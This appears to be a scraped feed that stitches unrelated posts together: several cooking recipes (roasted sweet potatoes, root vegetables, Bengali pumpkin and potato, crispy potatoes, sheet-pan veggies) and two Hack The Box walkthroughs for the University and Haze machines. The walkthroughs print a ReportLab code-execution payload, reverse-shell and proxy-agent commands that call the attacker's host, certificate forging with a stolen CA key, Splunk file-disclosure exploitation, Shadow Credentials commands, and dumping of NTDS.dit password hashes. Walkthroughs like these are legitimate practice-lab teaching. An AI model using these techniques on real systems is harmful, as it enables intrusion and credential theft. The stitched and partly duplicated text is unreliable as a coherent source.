Sweet potatoes are my go-to side dish because they’re incredibly forgiving and always delicious. Roasting them whole is the simplest method—no peeling or chopping required. They’re perfect for weeknight dinners, holiday meals, or Sunday suppers. Serve them as a simple side with butter and salt, or load them up with toppings for an easy vegetarian […]
The post Roasted Whole Sweet Potato appeared first on Simply Meat Smoking.
The vegetables: the baked vegetable tray is one recipe that allows you so much flexibility in terms of what you can have. You can make it as colourful as you like or as monochrome as you prefer. Here is a list of vegetables I like to throw into the tray.
For roasting: Olive oil, salt and herbs are the ones that work. The herbs I have chosen is rosemary and oregano. You can use thyme or basil as well.
Lets make baked root vegetables
The baked vegetables is the best use of a roasting tray.
Prep the vegetables: choose starchy tough vegetables to start with. Wash thoroughly. Cut them into big chunks or dices as you prefer. Keep the beets separately. The carrots, potato sweet potato, radish, parsnip, swedes, turnip can all go together.
Coat them in flavours. Since the vegetables are going to be soft and bland, it is best to coat them with flavours. Sprinkle salt, pepper abd drizzle oil and toss them well. For flavours I prefer to add fresh study herbs that just dont burn away. Rosemary, oregano and thyme are my first choice. Go with what feels natural to you. You can replace the pepper with chilli flakes if you like the heat. Lets the vegetable mix sit while you preheat the oven
Ensure that the beets are coated and kept separate.
Bake: preheat the oven at 180 degrees for 10 minutes. Place the vegetables on a roasting tray. Spread them out evenly. Poke in pieces of beets into the gaps so they cook along. Roast the vegetables for 35 to 40 minutes at 180 degrees Celsius on heat both from up and down. Half way through the time, flip the vegetables over to ensure even roasting. After about 35 minutes the vegetables will be ready and fork tender. Remove from heat and direct to the table. Or cool and proceed for storage.
The baked root vegetables are wonderful to add bulk to any meal or in the lunch box.
Baked root vegetable is an excellent vegan platter. It is filling, a mix of good healthy fibre and carbs and perfect for any vegan meal.
Once you have the baked veggies in meal prep you can have a hearty salad with it. For the dressing I prepare a generous mix of lemon and lime juice with some pepper and salt. Then you need some freshness. Chop up some tomatoes, a cucumber and handful of oregano, mint and parsley. Add all this into the mixing bowl with double the quantity of baked vegetables. Pour the dressing over it. Toss well and serve immediately. They are great sides to meals and double up as salads. You can add a bunch to your breakfasts to as hash.
There are a couple of ways you can achieve this. If you peel chop and place the beets separately, then place them on the tray to bake it will have zero leaching.
Another method is to ensure you add the beets right at the end, a quick toss in the oil and salt and straight into the oven.
Baked whole cauliflower
Dried peas nuggets
Hope you enjoy making this batch of low effort baked root vegetables. When you make your batch using this recipe, do share your thoughts and improvements in the comments below.
Pin this for later.
Stay subscribed see you in the next post.
Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.
Calling all home cooks looking for quick and healthy weekday/weeknight meal ideas – add this pumpkin & potato in mustard oil dish to your repertoire! It’s the kind that comes together in a jiffy, requires just one spice (coz salt and turmeric powder are MUSTS and don’t count) and pairs well with rice or Indian bread of choice.
The Pumpkin & Potato in Mustard Oil is a version of the Kumdo’r Chechki, a traditional Bengali side dish wherein the pumpkin is grated or (extremely) thinly sliced and slowly cooked in its own juices. It’s the kind of dish that celebrates the natural flavours of the vegetable. If you’d like to try a traditional chechki, head over to the recipe for Mulo Chechki (provided radishes are in season).
Do let me know if you try this recipe! Leave a comment and don’t forget to tag me on Instagram at from.the.corner.table and hashtag it #fromthecornertable. I’d love to see it 
For regular updates on recipes, recommendations on things to read and watch and ramblings that make sense, subscribe to the newsletter – you’ll find the form in the sidebar if viewing on a screen and at the bottom if viewing on the phone. Since spamming or flooding your inbox is a huge no for me, these newsletters go out only when I’ve put up a new post or sometimes, once in a month only.
Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.
Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.
Calling all home cooks looking for quick and healthy weekday/weeknight meal ideas – add this pumpkin & potato in mustard oil dish to your repertoire! It’s the kind that comes together in a jiffy, requires just one spice (coz salt and turmeric powder are MUSTS and don’t count) and pairs well with rice or Indian bread of choice.
The Pumpkin & Potato in Mustard Oil is a version of the Kumdo’r Chechki, a traditional Bengali side dish wherein the pumpkin is grated or (extremely) thinly sliced and slowly cooked in its own juices. It’s the kind of dish that celebrates the natural flavours of the vegetable. If you’d like to try a traditional chechki, head over to the recipe for Mulo Chechki (provided radishes are in season).
Do let me know if you try this recipe! Leave a comment and don’t forget to tag me on Instagram at from.the.corner.table and hashtag it #fromthecornertable. I’d love to see it 
For regular updates on recipes, recommendations on things to read and watch and ramblings that make sense, subscribe to the newsletter – you’ll find the form in the sidebar if viewing on a screen and at the bottom if viewing on the phone. Since spamming or flooding your inbox is a huge no for me, these newsletters go out only when I’ve put up a new post or sometimes, once in a month only.
Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.
Roasted potato recipe in the oven to satisfy your crispy potato cravings. Thes Crispy Oven Roasted Potatoes are the ultimate quick party snack! This easy oven roasted potatoes recipe makes golden, crunchy potatoes with a soft, fluffy center of the perfect crispy roasted potatoes.
All you need is just a handful of ingredients and follow a few simple steps that I am sharing along with tips for restaurant-level crunch right in your kitchen. I am sharing very simple tips to make crispiest roast pototoes with a satisfying crunch.
These oven roasted potatoes are incredibly versatile, and a perfect side dish or appetizer for any occasion. Whether for a cozy dinner or your next gathering, everyone will love these roasted potatoes!
With a golden, crunchy crust on the outside and a soft, fluffy center, these roasted potatoes are everything you want in a potato snack.
To store leftover roasted potatoes, transfer them to an airtight container and refrigerate them for up to three days. When reheating, it’s best to use the oven or an air fryer to restore their crisp texture. Avoid microwaving, as this will make them soggy. Simply spread the potatoes on a baking sheet and reheat them in a preheated oven at 200°C (400°F) for about 10 minutes, or until they’re crispy again.
These crispy roasted potato are perfect served as side dish for your favorite meals. Whether it’s grilled chicken, steak, or a fresh salad. They also make a fantastic party snack, especially when served with a dip like this Labneh Tomato Dip , Tzatziki or even Guacamole.
For a fancier presentation, sprinkle over some extra herbs or add a drizzle of truffle oil right before serving.
Yes! You can parboil the potatoes ahead of time and refrigerate them for up to 24 hours before roasting. This can actually make them even crispier.
Russet and Yukon Gold potatoes work best, but you can use red potatoes or fingerlings if needed. Just note that the texture may be slightly different.
Baking soda is key to breaking down the exterior of the potatoes, which creates that perfect crispy texture. You can skip it, but your potatoes may not be as crispy.
Store them in an airtight container in the fridge for up to 3 days. To reheat, place them in a hot oven or air fryer to restore their crispiness.
Yes! Parboil the potatoes, then freeze them in a single layer. When ready to cook, roast them directly from frozen—just add a few extra minutes to the cooking time.
If You like this recipe and made it Please rate the recipe. It helps us to reach more people. For the Latest updates Subscribe to Rekha’s Whatsapp. You can follow me on Instagram, Facebook, Youtube, Pinterest for more food inspirations.
The “University” machine on Hack The Box is an insanely difficult Windows Active Directory (AD) challenge that simulates a complex enterprise network. It involves exploiting a web application vulnerability, forging certificates, pivoting through internal networks, and abusing AD privileges to achieve domain compromise. This walkthrough provides a detailed guide to capturing both user and root flags, inspired by comprehensive write-ups like ManeSec’s, with step-by-step commands, full outputs, and troubleshooting tips for all skill levels.
Reconnaissance identifies services and attack vectors in the AD environment.
Scan all ports to map services.
Command:
Login
nmap -sC -sV 10.10.11.39 -oA initialOutput:
# Nmap 7.94SVN scan initiated Sat May 3 21:19:17 2025 as: nmap -sC -sV -oA initial 10.10.11.39
Nmap scan report for 10.10.11.39
Host is up (0.020s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-04 07:59:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-04T07:59:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h39m48s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 3 21:19:55 2025 -- 1 IP address (1 host up) scanned in 38.67 secondsAnalysis:
Exploit ReportLab’s RCE vulnerability in /profile’s PDF export to gain a wao shell.
When I accessed the web server, I saw a minimalistic and straightforward interface.
Navigating to the login page redirected us to an authentication portal. At this stage, no valid credentials were available, so progress could not continuer
Consequently, a new ‘Student’ account was created to further enumerate the application, given that this role appeared to be publicly accessible.
Random placeholder information filled the registration fields, as illustrated in the example above
We enter the credentials we created earlier.
Once the user logs in successfully, the system displays a dashboard similar to the screenshot above.
The section labelled ‘Profile Export’ appeared promising for exploring potential functionality or vulnerabilities
The PDF report uses a clear and concise format, modeled after the examples provided above
While analysing the PDF file, I identified it as a ReportLab-generated document, similar to those encountered during the Solarlab machine engagement
During the SolarLab machine exercise, the exploitation process resembled the steps outlined below
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('<command>') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>Therefore, the team retested the exploit on the current machine to confirm its applicability.
Let’s start our Python server listener
The exploitation method follows the general approach illustrated below
The profile was updated successfully.
A lack of response from the target indicated a failure
It may be necessary to trigger the action by clicking the “Profile Export” button
As expected, triggering the action returned a response.
Refined and updated the payload to achieve the intended outcome.
We received a response, but the file was missing
Let’s start the listener.
We executed a Python3 reverse shell script to establish a callback connection.
Unfortunately, I received no response from the target
I also conducted a test using a Base64-encoded PowerShell command.
Once again, there was no response from the target
The team adjusted the command and subsequently tested its effectiveness.
The callback succeeded this time, returning the shell.py file from the server.
The result exceeded expectations.
Access was successfully obtained for user ‘wao’.
Since we are using a Windows machine, let’s proceed to analyse BloodHound.
There is a significant amount of information here.
WAO belongs to the Domain Users group, so it inherits the default permissions and access rights assigned to all standard users within the domain.
By examining the browse.w connection, we were able to gather a substantial amount of information.
The only potentially valuable finding at this stage was db.sqlite3, which may contain database information.
In the CA directory, we found three important files: rootCA.crt, which is the root certificate; rootCA.key, the private key associated with the root certificate; and rootCA.srl, a file that tracks the serial numbers of issued certificates. These files are essential components for managing and validating the certificate authority’s trust chain.
Running the command icacls db.sqlite3 displays the access control list (ACL) for the file, showing the users and groups with permissions and the specific rights they hold. This information helps determine who can read, write, or execute the file, providing insight into the security and access restrictions applied to db.sqlite3.
Download the db.sqlite3 file to our local machine.
The screenshot above displays the available tables in the database.
Therefore, these hashes can be cracked at a later stage to uncover additional credentials.
We checked the DB-Backup directory and found a PowerShell script (.ps1 file) that might contain useful information.
Although the script doesn’t specify a username, it instead runs under the Windows account executing it, and therefore file and application access depend on that account’s permissions. For example, if the user cannot write to C:\Web\DB Backups\ or read db.sqlite3, then the backup will fail. Likewise, running external programs such as 7z.exe also requires the appropriate permissions.
After gaining access, I ran whoami /all and confirmed that the current user is wao. This matched the password I had earlier (WAO), which strongly indicates it belongs to this user. Although it’s not best practice, it’s common in misconfigured environments for usernames and passwords to be the same or closely related, which made the guess successful.
The term “Internal-VSwitch1” typically refers to a virtual switch created within a virtualization platform like Microsoft Hyper-V.
An “Internal” virtual switch in Hyper-V does not have an IP address itself; rather, the host’s virtual network adapter connected to that internal switch will have an IP address.
SeMachineAccountPrivilege and SeIncreaseWorkingSetPrivilege are disabled by the system, while SeChangeNotifyPrivilege remains enabled.
Let’s transfer the nmap binary to the victim’s machine
The team successfully executed the nmap scan on the victim’s machine
We encountered an error that required us to use the– unprivileged option for successful execution.
Unfortunately, the command still fails to work even after adding the –unprivileged option.
Therefore, at this point, let’s switch to using an alternative scanning tool like rustscan.
Finally, we successfully identified the open ports for the machines:
Stowaway serves as a multi-hop proxy tool for security researchers and penetration testers.
It allows users to route external traffic through multiple nodes to reach the core internal network, effectively bypassing internal network access restrictions. Creating a tree-like network of nodes simplifies management and access within complex network environments.
The following commands are available to use:
On our machine
./linux_x64_admin -l 10.10.16.38:2222 -s 111
On victim's machine
shell windows_x64_agent.exe -c 10.10.14.199:2222 -s 111
Upload the agent onto the victim’s machine.
Run the command I provided earlier.
If the connection is successful, it will appear as shown in the screenshot above.
Therefore, let’s perform port forwarding using the ports we identified earlier.
We can access WS-3 using the credentials obtained earlier.
Finally, we successfully gained access.
We also successfully accessed the LAB-2 environment.
The binary we discovered here indicates that we can escalate to root access easily without relying on an exploit.
I presume we have root access inside the Docker container.
Inside the README.txt file, the message reads:
Hello professors,
We have created this note for all users on the domain computers: WS-1, WS-2, and WS-3. These machines have not been updated since 10/29/2023. Since these devices are intended for content evaluation purposes, they must always have the latest security updates. Therefore, it is important to complete the current assessment before moving on to the "WS-4" and "WS-5" computers. The security team plans to begin updating and applying the new security policy early next month.
Kind regards,
Desk Team – Rose Lanosta
There’s nothing of interest that I found inside here related to the LAB-2 environment.
There is an Automation-Scripts directory that could potentially contain malicious code.
There are two PowerShell (.ps1) files we can examine within the Automation-Scripts directory.
Unfortunately, all access attempts were denied.
The date is displayed above.
The login page features a signed certificate.
A Certificate Signing Request (CSR) file is required to proceed further.
Execute the openssl req command.
A CSR file needs to be generated.
Use the following command to sign the CSR and generate the certificate:
openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out My-Certificate.crt -days 365 -sha256This command takes the CSR file My-CSR.csr, signs it using the CA’s certificate and key (rootCA.crt and rootCA.key), creates a serial number file if it doesn’t exist (-CAcreateserial), and outputs the signed certificate as My-Certificate.crt valid for 365 days using SHA-256.
Finally, we have provided the george.pem file.
Use the george.pem file to attempt the login.
Finally, we successfully accessed the system as george.
It will inform you that the signed certificate appears unusual because it is missing. He will then ask you to request a new certificate by uploading the forged professor’s CSR created earlier. Clicking submit triggers the download of a signed document named Professor-Signed-CertificateMy-CSR.csr.
Log out again, then use the signed-cert.pem file to log back in. You should be able to click on “Create a New Course” without encountering any errors.
You can now create a course—just write something, and after creating it, you will find an option at the bottom to add a new lecture.
Lastly, the Course Dashboard is displayed above.
The new course has been created successfully. Check out the Course Dashboard above to explore it.
There are three functions available within course preferences.
Let’s add a new lecture to the course.
Executing the command provided above.
Develop a malicious executable file.
Set up a new folder and upload the malicious file to it.
Generate the passphrase.
The command gpg -u george –detach-sign dark.zip utilizes GPG (GNU Privacy Guard) to generate a detached digital signature for the file dark.zip, ensuring its authenticity and integrity. By specifying the user ID “george” with the -u flag, the command employs George’s private key to create a separate signature file, typically dark.zip.sig, without modifying the original file.
Add a new course here.
The command gpg –export -a “george” > GPG-public-key.asc uses GPG (GNU Privacy Guard) to export the public key associated with the user ID “george” in ASCII-armored format (via the -a flag, making it human-readable text), and redirects the output to a file named GPG-public-key.asc. This file can then be shared for others to import and use for verifying signatures or encrypting messages intended for “george.”
Upload the file to the dashboard.
An error is displayed above stating “Invalid Lecture Integrity.”
Upload the public key here.
Upload the public key successfully
Start the listener in LAB-2.
After a short while, we successfully receive a reverse shell connection.
We successfully gained access to the system as the user martin.t
The user flag has been successfully retrieved.
We can read the user flag by typing type user.txt
SeChangeNotifyPrivilege is currently enabled, while SeIncreaseWorkingSetPrivilege is disabled in this environment.
We can retrieve scheduled tasks using the Get-ScheduledTask command.
It has been saved as shown above
There are numerous tasks with the states ‘READY‘ and ‘DISABLED‘.
This system is a virtualized Windows Server 2019 Standard (64-bit) named WS-3, running on an AMD processor under Hyper-V. It has 1.5 GB RAM with limited available memory and is part of the university.htb domain. The server is not using DHCP, with a static IP of 192.168.99.2, and has three security updates installed. The environment runs on Hyper-V virtualization with a UEFI BIOS.
This PowerShell command retrieves all the actions associated with the scheduled task named “Content Evaluator(Professor Simulatorr)” and formats the output as a detailed list showing every property of those actions.
We attempted to execute the LocalPotato exploit, but unfortunately, it failed.
The exploit succeeded when executed using PowerShell
We extracted the system information onto the victim’s machine.
We successfully retrieved the password for the user: v3ryS0l!dP@sswd#X
Let’s access the machine as Brose.W using the credentials we obtained earlier.
All privileges are accessible on this account.
Create a new directory using the appropriate command.
This sequence of PowerShell commands creates a script file named diskshadow.txt for use with the DiskShadow utility, which manages shadow copies (Volume Shadow Copy Service). Each echo command writes a line to the script. The first line sets the shadow copy context to persistent and disables writers to prevent interference. The second line targets the C: volume and assigns it the alias temp. The third line creates the shadow copy, and the last line exposes it as a new drive (Z:) using the alias. This process provides read-only access to a snapshot of the C: drive at a specific point in time. It’s useful for accessing protected or locked files, such as registry hives or system files, without triggering security measures. This technique is often used in system administration and security contexts to safely extract sensitive data from live systems.
The command diskshadow.exe /s c:\zzz\diskshadow.txt runs the DiskShadow utility with a script that creates a persistent shadow copy of the C: drive, assigns it an alias, and exposes it as a new drive for read-only access. This lets users access a snapshot of the drive at a specific time, bypassing file locks and permission restrictions. It’s commonly used in post-exploitation to extract sensitive files like registry hives or credentials without triggering security alerts.
Identified a website that can potentially be leveraged for privilege escalation.
Upload both files to the victim’s machine.
These commands import modules that enable backup privilege functionality, then use that privilege to copy the sensitive NTDS.dit file—a database containing Active Directory data—from the shadow copy (Z:) to a local directory (C:\dark). This technique allows extraction of critical directory data typically protected by system permissions.
Those files were downloaded to the local machine
We obtained the password hashes for the Administrator account
We can read the root flag by displaying the contents of the type root.txt file.
The post Hack The Box: University Machine Walkthrough – Insane Walkthrough appeared first on Threatninja.net.
High protein and fiber. Mix everything right in the pan meal, this Sheet pan roasted veggies and beans with Creamy Lemon Yogurt sauce, has amazing flavor and texture! Wrap it, bowl it, swipe with bread! So good! Gluten-free, options for soyfree, Nutfree
This is an easy, refreshing, spring and summer meal that you can put together within minutes. You make this amazingly refreshing lemon yogurt sauce and pair it with savory roasted veggies and crispy, crunchy beans that have been tossed in spices like paprika, coriander, black pepper, and garlic. They are crisp on the outside and tender on the inside.
The warm veggies and the cooling yogurt sauce are just fabulous together.
This is a veggie-heavy recipe rich in fiber, with over 14 grams per serving. It contains 15 to 25 grams of protein per serving, depending on the garnishes and non-dairy yogurt used. The protein in these sheet pan roasted vegetables comes from the beans, yogurt, sesame or hemp seeds, and even the vegetables. For an even more filling meal, serve with whole grain flatbread, pita, or naan.
You can pair them with the sauce in any way you like. You can put the sauce on a plate, top it with the roasted veggies, then top with some seeds and sprouts and a good squeeze of lemon juice.
Or make a wrap with pita bread or naan bread. Just warm the bread, add the yogurt sauce, the roasted veggies, some more sauce, sprouts, cucumber, and a squeeze of lemon, then serve.
Sheet pan veggies and beans are absolutely delicious any which way you serve it. You can even make small tacos out of it!
Continue reading: Sheet Pan Veggies and Beans with Lemon Yogurt Sauce
The post Sheet Pan Veggies and Beans with Lemon Yogurt Sauce appeared first on Vegan Richa.
In this write-up, we’ll go step-by-step through the Haze machine from Hack The Box, rated medium difficulty. The box involves exploring a Windows Active Directory (AD) environment with Splunk services. The path includes abusing a Splunk vulnerability, moving through Active Directory, and escalating privileges to grab both the user and root flags.
The goal is to complete Haze by achieving the following:
Using the decrypted paul.taylor password (Ld@p_Auth_Sp1unk@2k24) from splunksecrets, I gained WinRM access as mark.adams. After enumerating AD with netexec and retrieving the Haze-IT-Backup gMSA NTLM hash, I used PyWhisker and Certipy for a Shadow Credentials attack on edward.martin. This provided edward.martin’s NT hash, enabling WinRM access to read the user flag with type user.txt. Troubleshooting BloodyAD authentication issues was key to progressing through AD exploitation.
With Splunk admin credentials from a decrypted backup hash, I uploaded a malicious .tar.gz app containing a reverse shell to Splunk’s web interface (port 8000). The shell, caught via nc -lvnp 4444, had SeImpersonatePrivilege. Using SweetPotato, I escalated to NT SYSTEM and read the root flag with type root.txt. Fixing tar file upload errors ensured successful shell delivery.
We begin with a basic Nmap scan to identify services on the machine:
nmap -sC -sV 10.10.11.61 -oA initial
┌─[dark@parrot]─[~/Documents/htb/haze]
└──╼ $nmap -sC -sV 10.10.11.61 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-21 03:39 EDT
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.037s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-21 12:16:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http Splunkd httpd
|_http-title: 404 Not Found
8089/tcp open ssl/http Splunkd httpd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-server-header: Splunkd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 secondsAnalysis:
Navigated to http://haze.htb:8000, which presented a Splunk Enterprise login page, indicating a web-based attack surface.
Visited http://haze.htb:8088, which returned a 404 error, suggesting no exploitable content.
Accessed http://haze.htb:8089, revealing a Splunk Atom feed that leaked the version (9.2.1), critical for identifying vulnerabilities.
Searched for Splunk 9.2.1 exploits, finding CVE-2024-36991, a local file inclusion (LFI) vulnerability allowing unauthorised file access:
The Splunk 9.2.1 authentication.conf documentation explains how Splunk manages user authentication. It defines how credentials are stored, including LDAP bindings, and supports integrating with external authentication systems. Misconfigurations here can expose sensitive data—like encrypted passwords and bindDNs—making it a critical target for exploitation during assessments
Think of your computer or phone as a house with many doors and windows. Each one is a way to interact with the device. Now, imagine one of the locks isn’t working properly—it looks secure, but a clever intruder could still get in.
CVE-2024-36991 is like that broken lock, but in software. It’s a hidden flaw that, if found by the wrong person, could let them sneak into the system without permission. They might steal data, cause damage, or disrupt how things work.
The good news is that once these flaws are discovered, the developers usually fix them quickly, like calling a locksmith to repair a faulty lock. That’s why it’s so important to keep your apps and devices updated. Updates are your best defence against these types of security issues.
Downloaded the CVE-2024-36991 PoC to test the LFI vulnerability
I downloaded the publicly available proof-of-concept (PoC) and tested it using curl to retrieve sensitive configuration files, such as authentication.conf
The exploit was successful and allowed access to /etc/passwd, dumping several user password hashes
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=Although hashcat didn’t crack the hashes within a 5-minute test, the PoC also revealed an encrypted bindDNpassword used in Splunk’s LDAP integration:
Knowing that Splunk stores a symmetric key in splunk.secret, I used the same LFI to retrieve that key. With both the encrypted password and the key, I used the splunksecrets tool to attempt decryption.
Installed Splunksecrets to decrypt the hash
Diagnosis:
Downgraded cryptography to a compatible version
I’m currently facing a fairly common issue—it’s related to how a Python package references the cryptography library. In this case, the splunksecrets package is trying to import a module from cryptography.hazmat.decrepit, which doesn’t exist. The correct path should be cryptography.hazmat.primitives.
To fix this, I’ll need to manually edit the file located at:
/home/dark/.local/lib/python3.12/site-packages/splunksecrets/splunk.pyOn line 6, the import statement needs to be corrected.
Current line:
from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4Updated line:
from cryptography.hazmat.primitives.ciphers.algorithms import ARC4Once that’s updated, it should resolve the issue.
The splunksecrets tool offers various commands to encrypt and decrypt passwords related to Splunk and its components. It supports decrypting and encrypting credentials used for database connections (dbconnect), as well as passwords associated with Phantom assets. The tool also provides functionality to handle passwords encrypted with both current and legacy Splunk algorithms. Additionally, it can generate password hashes compatible with Splunk’s authentication system. This versatility makes splunksecrets a useful utility for recovering sensitive information during security assessments involving Splunk environments.
I decrypted the encrypted LDAP password by running the splunksecrets tool with the Splunk secret file and the captured ciphertext. This process successfully revealed the plaintext password for the user paul.taylor as Ld@p_Auth_Sp1unk@2k24, which can be used for LDAP authentication or further privilege escalation.
Tested credentials on SMB and LDAP
Attempted WinRM access with paul.taylor, but it failed
Enumerated AD users to find other accounts
Manually extracting the username is tedious, so the screenshot above shows a quicker way I used to identify it.
Discovered mark.adams and tested the same password, gaining WinRM access
Successfully connected to the machine via evil-winrm.
The easiest way to understand mark.adams’s connections are by using BloodHound
The user mark.adams is a member of the gMSA Administrators group, granting access to retrieve and decrypt managed service account passwords from Active Directory. This privilege enables direct access to sensitive credentials (msDS-ManagedPassword), allowing privilege escalation or impersonation. It also opens paths for advanced attacks like NTLM relay or the Golden gMSA attack, which can provide persistent, stealthy access across the domain.
The details above display the properties of mark.adam.
I used a tool to connect to the target computer using the username “mark.adams” and the password I found. This confirmed that the credentials were correct and allowed me to access the system, which is running a recent version of Windows Server. The connection used standard network services to communicate securely with the target.
The command executes BloodHound-python to collect Active Directory data using the machine account Haze-IT-Backup$. Instead of using a password, it authenticates with an NTLM hash (735c02c6b2dc54c3c8c6891f55279ebc)—a common technique during post-exploitation. The domain is specified as haze.htb, and the domain controller being queried is dc01.haze.htb, with the nameserver IP 10.10.11.61. The -c all flag instructs BloodHound to perform a full collection of all supported data types (such as sessions, ACLs, group memberships, etc.), and --zip compresses the output into a ZIP archive for easier ingestion into the BloodHound UI.
The machine account haze-it-backup$@haze.htb is a member of both support_services@haze.htb and Domain Computers@haze.htb groups. Membership in the Domain Computers group is standard for all domain-joined machines and typically grants basic permissions within the domain. However, its inclusion in the support services group may indicate elevated privileges or specific access rights related to IT support operations. This group membership may present an opportunity for privilege escalation, particularly if the support_services group has delegated permissions over high-value domain objects or privileged user accounts.
Attempted to retrieve gMSA NTLM hash, initially blank
I imported the Active Directory module and set the variable $gMSAName to “Haze-IT-Backup” and $principal to “mark.adams”. Then, I configured the managed service account so that the user mark.adams is authorised to retrieve the managed password.
You can also perform the same action using a one-liner command
We obtained the NTLM hash, but keep in mind that each user has a unique NTLM hash, so everyone will get a different one.
As shown by the results, the LDAP permissions now exceed regular permissions, allowing you to easily collect Domain Objects and DACLs, making enumeration straightforward for the user mark.adams.
An attempt to use BloodyAD for further exploitation failed due to invalid credentials, preventing successful authentication.
I had to rack my brain to figure out the issue, but after removing the $ from the Haze-IT-Backup username and running the ntpdate command, everything worked smoothly.
I also executed the BloodyAD commands displayed earlier to assign permissions and add group memberships to the Haze-IT-Backup account.
These commands attempt to escalate privileges by granting the Haze-IT-Backup account full control (genericAll) over the SUPPORT_SERVICES group and adding the service account as a member of that group.
I also ran a series of PyWhisker commands to manage permissions for the user edward.martin using the Haze-IT-Backup$ account:
pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "list"The initial listing showed that the msDS-KeyCredentialLink attribute was empty or inaccessible.
pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "add"This generated a certificate and key, updated the msDS-KeyCredentialLink attribute for edward.martin, and saved a PFX certificate file protected by a password. This certificate can be used to obtain a Ticket Granting Ticket (TGT) with external tools.
pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "list"This showed the new DeviceID and its creation timestamp.
#!/bin/bash
# Variables - replace with actual values
IP="10.10.11.61"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASSWORD=":YOUR_PASSWORD_HERE"
TARGET_USER="edward.martin"
HASH="" # Set this at runtime or before running commands
# Change owner of SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 set owner 'SUPPORT_SERVICES' "$USER"
